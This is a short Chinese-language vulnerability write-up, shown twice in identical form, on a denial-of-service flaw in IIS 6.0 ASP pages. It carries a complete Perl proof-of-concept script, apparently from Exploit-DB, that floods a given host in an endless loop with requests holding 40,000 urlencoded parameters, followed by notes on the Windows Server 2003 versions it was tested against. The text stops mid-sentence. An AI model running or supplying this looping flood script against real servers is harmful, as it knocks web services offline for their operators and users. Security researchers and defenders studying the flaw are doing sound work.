攻击者发送一个POST请求到ASP页，在POST请求中包含大于 40000请求参数，并在发送时用x-www-form-urlencoded编码 。攻击者利用此漏洞可导致IIS辅助进程崩溃，造成导致默认应用程序池被禁用拒绝服务。 PoC Exploit ： 01.# IIS 6.0 ASP DoS PoC 02.# usage: perl IISdos.pl <host> <asp page> 03.use IO::Socket; 04.$|=1; 05.$host = $ARGV[0]; 06.$script = $ARGV[1]; 07.while(1) { 08.$sock = IO::Socket::INET->new(PeerAddr => $host, 09.                   PeerPort => 'http(80)', 10.                   Proto => 'tcp'); 11.$write = "C=A&" x 40000; 12.print $sock "HEAD /$script HTTP/1.1\r\nHost: $host\r\n" 13.           ."Connection:Close\r\nContent-Type: application/x-www-form-urlencoded\r\n" 14.           ."Content-Length:". length($write) ."\r\n\r\n" . $write; 15.print "."; 16.while(<$sock>) { 17.           print; 18.} 19.} 20. 21. 22.EDB Notes: 23.In our tests, a specific setting has to be modified in metabase.xml in order to trigger the exhaustion. Tested systems that are vulnerable: Windows Server 2003 Standard SP2, Windows Server 2003 Standard

攻击者发送一个POST请求到ASP页，在POST请求中包含大于 40000请求参数，并在发送时用x-www-form-urlencoded编码 。攻击者利用此漏洞可导致IIS辅助进程崩溃，造成导致默认应用程序池被禁用拒绝服务。 PoC Exploit ： 01.# IIS 6.0 ASP DoS PoC 02.# usage: perl IISdos.pl <host> <asp page> 03.use IO::Socket; 04.$|=1; 05.$host = $ARGV[0]; 06.$script = $ARGV[1]; 07.while(1) { 08.$sock = IO::Socket::INET->new(PeerAddr => $host, 09.                   PeerPort => 'http(80)', 10.                   Proto => 'tcp'); 11.$write = "C=A&" x 40000; 12.print $sock "HEAD /$script HTTP/1.1\r\nHost: $host\r\n" 13.           ."Connection:Close\r\nContent-Type: application/x-www-form-urlencoded\r\n" 14.           ."Content-Length:". length($write) ."\r\n\r\n" . $write; 15.print "."; 16.while(<$sock>) { 17.           print; 18.} 19.} 20. 21. 22.EDB Notes: 23.In our tests, a specific setting has to be modified in metabase.xml in order to trigger the exhaustion. Tested systems that are vulnerable: Windows Server 2003 Standard SP2, Windows Server 2003 Standard